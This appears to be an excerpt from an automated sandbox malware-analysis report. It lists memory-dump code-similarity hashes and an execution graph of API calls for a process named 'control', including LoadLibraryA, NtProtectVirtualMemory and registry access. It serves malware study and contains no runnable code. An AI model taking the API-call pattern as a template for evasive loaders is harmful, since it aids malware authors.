                                                                                                                                              • Instruction ID: 0ca102c081c1c10ebedaf0d634de682a6ee3836cbf02cdb44f2f6470991695a8
                                                                                                                                              • Opcode Fuzzy Hash: 0410a4167a375566f8ba12f17147ce5c8607138fe5ce19b47042865aa484ad92
                                                                                                                                              • Instruction Fuzzy Hash: C9D1843522CA488FDB58FF28E885A6AB3E1FB99300F15456DE45BC3261DF34E845CB42
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 38ef7869ea58fb94598961df75031656996b7b80e58d3b09030ad0ec587d72ab
                                                                                                                                              • Instruction ID: 602dbca924ef48541a0279ced8948289bde14eceb65a6a058bd268bd9dc55087
                                                                                                                                              • Opcode Fuzzy Hash: 38ef7869ea58fb94598961df75031656996b7b80e58d3b09030ad0ec587d72ab
                                                                                                                                              • Instruction Fuzzy Hash: CAE17E30B14B059FEB58EB39DCA5AA673E6FBDD301B448079984AC3360DE38D945CB51
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 6856baa2744d5c5f37773981dc3747ff70e285344847ae6b40f5a8a125173493
                                                                                                                                              • Instruction ID: c7e022d9e2fa9a2cb5043ca1aa65acd2528809561a9005d78b3daf626fbd4573
                                                                                                                                              • Opcode Fuzzy Hash: 6856baa2744d5c5f37773981dc3747ff70e285344847ae6b40f5a8a125173493
                                                                                                                                              • Instruction Fuzzy Hash: 28D1A43161CA088FEB5AEF28EC9996A73E5F798300700466ED45FD3265DF38DA45CB81
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 948161d6fa15a810aa6e5b6e230907f9d72ef5ce46a0806776a272e79ee9e756
                                                                                                                                              • Instruction ID: 4122355ac252aa20c8ae3777f0147a078da6f36d6dc42c17cf694f4cc04fac36
                                                                                                                                              • Opcode Fuzzy Hash: 948161d6fa15a810aa6e5b6e230907f9d72ef5ce46a0806776a272e79ee9e756
                                                                                                                                              • Instruction Fuzzy Hash: 72E1633060CB488FDB69EF24DC99AAAB7E1FB99311F14456DE48EC3121DB34D945CB82
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 0cc8c4c9f205f58748cb3b44b050f6e6f9e6345d57d988be40e27c4f8ce905cb
                                                                                                                                              • Instruction ID: 5fc2935f3df75b08e78368442c451036485a64c4dcd9b51a13556f8699b38064
                                                                                                                                              • Opcode Fuzzy Hash: 0cc8c4c9f205f58748cb3b44b050f6e6f9e6345d57d988be40e27c4f8ce905cb
                                                                                                                                              • Instruction Fuzzy Hash: BAC19030218A058FEF98DF28C8897AAB7E5FB99345F50457DD48BC3691DB38D851CB82
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 38711eba31781e4de2b32a3d4a8a3a54250a23ca74fa31da85b9ea8fcf3ad2ab
                                                                                                                                              • Instruction ID: b4d8a53392de08c3204434bde6e6a4f11a32bf0f64b4665fa14092d6edd3a5ae
                                                                                                                                              • Opcode Fuzzy Hash: 38711eba31781e4de2b32a3d4a8a3a54250a23ca74fa31da85b9ea8fcf3ad2ab
                                                                                                                                              • Instruction Fuzzy Hash: 52C14B70618B098FDBA4EF28D888B6A77F6FB98701F508579E44EC3261DB34D945CB42
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseQueryValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3356406503-0
                                                                                                                                              • Opcode ID: fe302deaf498671735d961f0a066218eb8c14df84780a904b4dffb1cfaa5c9dd
                                                                                                                                              • Instruction ID: e4055d373d29554417043b33f2023ef21a5f638d6e701891f6f076e5671c080c
                                                                                                                                              • Opcode Fuzzy Hash: fe302deaf498671735d961f0a066218eb8c14df84780a904b4dffb1cfaa5c9dd
                                                                                                                                              • Instruction Fuzzy Hash: C4A18031718A088FD779EF28D88567AB7E2F789300F65867DD49FC3255DE34A8428782
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 280b5ea547be97f12bd2d338b9f92d1c614892cb3105043b1a309246ffb6b572
                                                                                                                                              • Instruction ID: 8905f46653b584bec1954bcf54d93b7b7cb544dc8e681df0d716b298221c4332
                                                                                                                                              • Opcode Fuzzy Hash: 280b5ea547be97f12bd2d338b9f92d1c614892cb3105043b1a309246ffb6b572
                                                                                                                                              • Instruction Fuzzy Hash: 19B17F30618B098FDB68DF18D885B66B7E5FB98311F54856DE99EC3250DB34E842CF82
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 40becd915303a3bf600ab9d0924b14316bcba838081402962a61d943fc700c8c
                                                                                                                                              • Instruction ID: 14ff5bf75990e93585e41cfaa6feaf99444a8eb3a555de51664dc544733c6e71
                                                                                                                                              • Opcode Fuzzy Hash: 40becd915303a3bf600ab9d0924b14316bcba838081402962a61d943fc700c8c
                                                                                                                                              • Instruction Fuzzy Hash: A381E73121CB488FEB65EF2CD8896A977E1F799310F00457EE44AC3292EE34DD458786
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Create
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2289755597-0
                                                                                                                                              • Opcode ID: 7e0d6ca746b9e6f46bedcdbd6d505a8630fe9095657e2771a051d93914121220
                                                                                                                                              • Instruction ID: 09192fdcd97f54b18396052ba6353c454c2021de22b014cdd133b57fefc662d0
                                                                                                                                              • Opcode Fuzzy Hash: 7e0d6ca746b9e6f46bedcdbd6d505a8630fe9095657e2771a051d93914121220
                                                                                                                                              • Instruction Fuzzy Hash: 4D9171307186498FEB64EF24D89976AB3E2FB88305F44857DE48AC21A1DF78D941CB42
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 92c0d9c28f7b14cf48f0e7bc275c44090f6c1faebb4c9eff1c20231799670893
                                                                                                                                              • Instruction ID: 0e5b28c9ce130bf134f15788cf716c30888a56643945852cd576fd3214cc8504
                                                                                                                                              • Opcode Fuzzy Hash: 92c0d9c28f7b14cf48f0e7bc275c44090f6c1faebb4c9eff1c20231799670893
                                                                                                                                              • Instruction Fuzzy Hash: 40816E3160CB598FDB28EF58EC8566AB7E1EBD4701F04466ED44EC3265DF74E8018B86
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9872f95907a3fff3bb2dc15ad370fe03462685fd16831ec47ef12214c055560d
                                                                                                                                              • Instruction ID: fbf6d3f42d3b36b2c2e56d5020059a0e953b3d85cf46a7069b0a694ae34d6dad
                                                                                                                                              • Opcode Fuzzy Hash: 9872f95907a3fff3bb2dc15ad370fe03462685fd16831ec47ef12214c055560d
                                                                                                                                              • Instruction Fuzzy Hash: F681753061CB098FDF58FF29D899A6677E1FBA8301B14496DE44AC3265DF34E841CB81
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 66179212810935a8c24ca55900a10875e2e60a99fd685c80c6d3f40906bda9a8
                                                                                                                                              • Instruction ID: 3eadde6e028f6ef25b37330ba68c94890c186618b3125450619cd0cdbd5df93e
                                                                                                                                              • Opcode Fuzzy Hash: 66179212810935a8c24ca55900a10875e2e60a99fd685c80c6d3f40906bda9a8
                                                                                                                                              • Instruction Fuzzy Hash: 3E71A231218F0A8FDB64FF6C988966AB3D5FBA9310B4542ADD80AC3265EF34D805C781
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 20d07e163d5561e6cb2de8386772746ac9d79f432579530db84dc555c3bfe41a
                                                                                                                                              • Instruction ID: 83cce6f3a7d860cc57aed0b4e22f014f820b003f7255da45e9a927aabdaedf3b
                                                                                                                                              • Opcode Fuzzy Hash: 20d07e163d5561e6cb2de8386772746ac9d79f432579530db84dc555c3bfe41a
                                                                                                                                              • Instruction Fuzzy Hash: 23716131618A088FEB98EF1CD49576933D1FB99740F44C5E9ED1ECB256EA24DC42CB82
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 63e28886487f74e342c32be38909b8fe1cb0233e2626cf88d521a93613bc1520
                                                                                                                                              • Instruction ID: 859dc22cadc7aa77075c482882481103a28c64bbc3e863654d58c9e9657bf613
                                                                                                                                              • Opcode Fuzzy Hash: 63e28886487f74e342c32be38909b8fe1cb0233e2626cf88d521a93613bc1520
                                                                                                                                              • Instruction Fuzzy Hash: D071A23161DB088FE754EF6DDC89A6AB7E5FB98711F10856EE44AC3210DB74E841CB82
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 83b4e4303a3a045f9e01f9880aa6fe171011acb70a9d52f974b2da6cf2d59583
                                                                                                                                              • Instruction ID: 0931fcb375fe9958bd5baa46e14c9cfe7dfe591e9c76082497ba52e4d84f25fe
                                                                                                                                              • Opcode Fuzzy Hash: 83b4e4303a3a045f9e01f9880aa6fe171011acb70a9d52f974b2da6cf2d59583
                                                                                                                                              • Instruction Fuzzy Hash: A961E33161DA484FDB68BB2C985667A73D9FB94310F1549ADE88BD3251EE20EC43C7C2
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseQueryValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3356406503-0
                                                                                                                                              • Opcode ID: 3a44364c1016a49f04a174e3afe068aeab8b5f2945e2751d4b9c629dff2ad2c2
                                                                                                                                              • Instruction ID: 2147dcd702a7a08f049a9cc1feb68122d845dee34f5ee3c3bf467e533ff4201e
                                                                                                                                              • Opcode Fuzzy Hash: 3a44364c1016a49f04a174e3afe068aeab8b5f2945e2751d4b9c629dff2ad2c2
                                                                                                                                              • Instruction Fuzzy Hash: 26717C30618A098FEB64EF78D885BAAB3E5FB98301F40856ED44EC7255DF34D941CB82
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 7ce160d619847d54f4be3adc656e223daaab6dc6a76314402b8f61af63e542f7
                                                                                                                                              • Instruction ID: 1a28cb35ab7935cec805ecc0c78719429a99d86925ee60b55ecc243ed928f35f
                                                                                                                                              • Opcode Fuzzy Hash: 7ce160d619847d54f4be3adc656e223daaab6dc6a76314402b8f61af63e542f7
                                                                                                                                              • Instruction Fuzzy Hash: 5E61A830708A488FDF64EF6C9C9856977E6FBA9301B15496EE44AC3260DF38D843CB46
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 56514dbe61aac1fa13fd9da6dcc3f65dbb396996e43bc20d70b628ec65a670a2
                                                                                                                                              • Instruction ID: c28a4b563c2638bba3e8450872f43dafaf4775a6870adc3d843327bf698f3dde
                                                                                                                                              • Opcode Fuzzy Hash: 56514dbe61aac1fa13fd9da6dcc3f65dbb396996e43bc20d70b628ec65a670a2
                                                                                                                                              • Instruction Fuzzy Hash: 2E519031718E094FAB68FB2DAC9A67973D6E7E8311314816EE40AC3265DE38D807C781
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 87212040f7791581802ebfb24c456a6cd4a98c2c83bdb6ee99117a63e13e8226
                                                                                                                                              • Instruction ID: a162acff21ff918faa294153a0d3c1d3f32935a9feb29cc5aecd7e91eeb0b07c
                                                                                                                                              • Opcode Fuzzy Hash: 87212040f7791581802ebfb24c456a6cd4a98c2c83bdb6ee99117a63e13e8226
                                                                                                                                              • Instruction Fuzzy Hash: 20619031718A499FDB68FF68D889679B3E2FB98701F54453DD08AC3650DB34D806CB82
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 36f556d1b6bda4cf9978c5a6a125f21c466a14fffa3b6bd7b7cefd5bf313fa60
                                                                                                                                              • Instruction ID: 7b459ebb8f495742dead81521d2254462afb533627ab5df92df6d6b46aba1da1
                                                                                                                                              • Opcode Fuzzy Hash: 36f556d1b6bda4cf9978c5a6a125f21c466a14fffa3b6bd7b7cefd5bf313fa60
                                                                                                                                              • Instruction Fuzzy Hash: 4A316F347147058BEB08EF78D899A6677E2FBD8301B04C93DE945C3224DE79DC818B81
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a9c2d71df9ba96d9697ca19b724d09e34a4cb7770348c426de2a33892a8029ec
                                                                                                                                              • Instruction ID: d00b2189d9ee76100b26e8d8d75f8deef81a3edcde8527ca28526a6dc83adb00
                                                                                                                                              • Opcode Fuzzy Hash: a9c2d71df9ba96d9697ca19b724d09e34a4cb7770348c426de2a33892a8029ec
                                                                                                                                              • Instruction Fuzzy Hash: 20414C1511DBC2AEC31ADA2D84401A9FFA1BFB6100B48879DD4C997F43C358E669C7E6
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: dddd3ca5bb177d580940e9c3c5e54999e5dd2f8092cf2c07f884e3a752e35e77
                                                                                                                                              • Instruction ID: c675e73cfdb323ae53f3ca5e0d46f7fb0be3c849e7557da3d32237ab53221ae2
                                                                                                                                              • Opcode Fuzzy Hash: dddd3ca5bb177d580940e9c3c5e54999e5dd2f8092cf2c07f884e3a752e35e77
                                                                                                                                              • Instruction Fuzzy Hash: 2C318E1111DBC7AED30ADA6C8040169FFA1FB77200B48879DD4D597B43C318E6A9C7E2
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:2.7%
                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                              Signature Coverage:0%
                                                                                                                                              Total number of Nodes:516
                                                                                                                                              Total number of Limit Nodes:32

                                                                                                                                              Graph

                                                                                                                                              execution_graph 14283 27ff74f17e6 14284 27ff74f170d 14283->14284 14284->14283 14285 27ff74f1310 LoadLibraryA 14284->14285 14285->14284 14286 27ff74e55e4 14287 27ff74e55fc 14286->14287 14289 27ff74e561e 14286->14289 14290 27ff74d2f0c 14287->14290 14291 27ff74d2f4c 14290->14291 14295 27ff74d2f54 14291->14295 14296 27ff74ef1d4 14291->14296 14293 27ff74d302e 14294 27ff74ef1d4 3 API calls 14293->14294 14293->14295 14294->14295 14295->14289 14297 27ff74ef1fd 14296->14297 14299 27ff74ef236 14297->14299 14300 27ff74e98dc 14297->14300 14299->14293 14301 27ff74e990c 14300->14301 14306 27ff74e8108 14301->14306 14303 27ff74e9cf0 14303->14299 14304 27ff74e9a92 14304->14303 14310 27ff74c1e24 14304->14310 14307 27ff74e8126 14306->14307 14309 27ff74e812b 14306->14309 14308 27ff74c1e24 3 API calls 14307->14308 14308->14309 14309->14304 14311 27ff74c1e4f 14310->14311 14312 27ff74e0f8c 3 API calls 14311->14312 14313 27ff74c1e75 14312->14313 14314 27ff74c1eac 14313->14314 14316 27ff74ea7cc 14313->14316 14314->14303 14317 27ff74ea7e5 14316->14317 14318 27ff74ea864 2 API calls 14317->14318 14319 27ff74ea815 14317->14319 14318->14319 14319->14314 14632 27ff74ea8f8 14633 27ff74ea9b0 14632->14633 14634 27ff74ea900 14632->14634 14634->14633 14635 27ff74df560 lstrcmp 14634->14635 14635->14633 14329 27ff74d0a0c 14333 27ff74d0a37 14329->14333 14330 27ff74d0ba8 14331 27ff74ccec0 2 API calls 14330->14331 14331->14330 14332 27ff74e5f7c RegQueryValueExA RegCreateKeyA RegOpenKeyA 14332->14333 14333->14330 14333->14332 14335 27ff74ccec0 14333->14335 14336 27ff74ccf12 14335->14336 14337 27ff74e10cc 2 API calls 14336->14337 14338 27ff74cd000 14336->14338 14337->14338 14338->14333 14650 27ff74f1701 14652 27ff74f170d 14650->14652 14651 27ff74f1310 LoadLibraryA 14651->14652 14652->14651 14349 27ff7501002 14354 27ff750100f 14349->14354 14350 27ff7501255 NtProtectVirtualMemory 14351 27ff750133a 14350->14351 14352 27ff75012a6 14350->14352 14352->14351 14353 27ff75012ee NtProtectVirtualMemory 14352->14353 14353->14351 14353->14352 14354->14350 14354->14351 14657 27ff74eb516 14658 27ff74eb52c 14657->14658 14659 27ff74ea864 2 API calls 14658->14659 14660 27ff74eba3e 14658->14660 14665 27ff74eb551 14659->14665 14661 27ff74eacac 8 API calls 14661->14665 14662 27ff74e98dc 3 API calls 14662->14665 14663 27ff74c1e24 3 API calls 14663->14665 14664 27ff74e17c8 3 API calls 14664->14665 14665->14660 14665->14661 14665->14662 14665->14663 14665->14664 14666 27ff74cc134 5 API calls 14665->14666 14667 27ff74c94f0 RegCreateKeyA RegOpenKeyA 14665->14667 14666->14665 14667->14665 14671 27ff74f1113 14672 27ff74f111f 14671->14672 14673 27ff74f1310 LoadLibraryA 14672->14673 14674 27ff74f115e 14673->14674 14279 27ff74f1310 14280 27ff74f13b4 14279->14280 14282 27ff74f138f 14279->14282 14281 27ff74f1448 LoadLibraryA 14280->14281 14280->14282 14281->14282 14376 27ff74e1ba4 14377 27ff74e1bed 14376->14377 14378 27ff74e1c63 14377->14378 14380 27ff74d7910 14377->14380 14381 27ff74d7949 14380->14381 14382 27ff74c27e8 lstrcmp 14381->14382 14383 27ff74d79bd 14381->14383 14382->14383 14383->14378 14683 27ff74e56bd 14686 27ff74e7ef4 14683->14686 14685 27ff74e56cf 14687 27ff74e7f1b 14686->14687 14689 27ff74e8038 14686->14689 14688 27ff74e676c lstrcmp 14687->14688 14687->14689 14691 27ff74e7f99 14688->14691 14689->14685 14690 27ff74e1504 lstrcmp 14690->14689 14691->14689 14691->14690 14388 27ff74c5bb7 14391 27ff74df0c4 14388->14391 14393 27ff74df0f8 14391->14393 14392 27ff74c5bd4 14393->14392 14395 27ff74d076c 4 API calls 14393->14395 14396 27ff74df15f 14393->14396 14395->14396 14396->14392 14397 27ff74c94f0 14396->14397 14398 27ff74c9513 14397->14398 14399 27ff74c9540 14398->14399 14400 27ff74e1e58 2 API calls 14398->14400 14399->14392 14400->14399 14692 27ff74cfeb8 14694 27ff74cfefe 14692->14694 14693 27ff74d0045 14694->14693 14695 27ff74c6818 6 API calls 14694->14695 14695->14693 14696 27ff74e5ab9 14697 27ff74e5ac9 14696->14697 14698 27ff74e5af0 14696->14698 14697->14698 14699 27ff74e1e58 2 API calls 14697->14699 14699->14698 14405 27ff74eafb8 14406 27ff74eb025 14405->14406 14407 27ff74eb11e 14406->14407 14408 27ff74df0c4 4 API calls 14406->14408 14411 27ff74df0c4 4 API calls 14407->14411 14412 27ff74eba3e 14407->14412 14409 27ff74eb095 14408->14409 14409->14407 14410 27ff74df0c4 4 API calls 14409->14410 14413 27ff74eb0b5 14410->14413 14420 27ff74eb1c8 14411->14420 14413->14407 14414 27ff74df0c4 4 API calls 14413->14414 14415 27ff74eb0e9 14414->14415 14415->14407 14417 27ff74df0c4 4 API calls 14415->14417 14416 27ff74eb51a 14416->14412 14419 27ff74ea864 2 API calls 14416->14419 14417->14407 14418 27ff74df0c4 4 API calls 14421 27ff74eb3a1 14418->14421 14429 27ff74eb551 14419->14429 14420->14412 14420->14416 14420->14418 14421->14412 14423 27ff74ea7cc 2 API calls 14421->14423 14425 27ff74eb3f4 14421->14425 14423->14425 14424 27ff74eacac 8 API calls 14424->14429 14432 27ff74d9cb0 14425->14432 14426 27ff74e98dc 3 API calls 14426->14429 14427 27ff74c1e24 3 API calls 14427->14429 14429->14412 14429->14424 14429->14426 14429->14427 14431 27ff74c94f0 RegCreateKeyA RegOpenKeyA 14429->14431 14437 27ff74e17c8 14429->14437 14444 27ff74cc134 14429->14444 14431->14429 14433 27ff74ddc90 2 API calls 14432->14433 14435 27ff74d9cf0 14433->14435 14434 27ff74d9f35 14434->14416 14435->14434 14436 27ff74e676c lstrcmp 14435->14436 14436->14435 14438 27ff74e17f6 14437->14438 14439 27ff74e1989 14438->14439 14442 27ff74e1800 14438->14442 14440 27ff74c1e24 3 API calls 14439->14440 14441 27ff74e18bc 14440->14441 14441->14429 14442->14441 14443 27ff74ea864 2 API calls 14442->14443 14443->14441 14445 27ff74d076c 4 API calls 14444->14445 14446 27ff74cc15b 14445->14446 14447 27ff74e98dc 3 API calls 14446->14447 14448 27ff74cc27d 14446->14448 14447->14448 14449 27ff74e1e58 2 API calls 14448->14449 14450 27ff74cc365 14448->14450 14449->14450 14450->14429 14710 27ff74c26b0 14712 27ff74c2767 14710->14712 14713 27ff74c26db 14710->14713 14711 27ff74df560 lstrcmp 14711->14712 14713->14711 14713->14712 14714 27ff74e74cc 14715 27ff74e7510 14714->14715 14716 27ff74e77d5 14715->14716 14718 27ff74e7584 14715->14718 14722 27ff74e76a5 14715->14722 14717 27ff74e676c 